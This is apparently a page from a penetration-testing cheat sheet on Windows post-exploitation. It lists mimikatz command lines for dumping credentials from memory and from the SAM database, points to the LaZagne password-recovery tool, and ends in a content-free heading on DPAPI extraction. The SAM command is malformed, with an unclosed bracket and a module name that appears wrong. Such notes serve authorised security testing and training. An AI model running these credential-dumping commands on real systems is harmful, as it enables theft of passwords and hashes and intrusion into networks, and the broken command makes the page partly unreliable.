Post-Exploitation

Dump hashes with mimikatz

From memory

.\mimikatz.exe "sekurlsa::logonpasswords" exit

From SAM

.\mimikatz.exe "sekurlsa::sam /sam:<path_to_sam /system:<path_to_system> exit

LaZagne

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer.

LogoGitHub - AlessandroZ/LaZagne: Credentials recovery projectGitHub

dpapi extract with mimikatz

PreviousPrivilege EscalationNextCross-domain enumeration

Last updated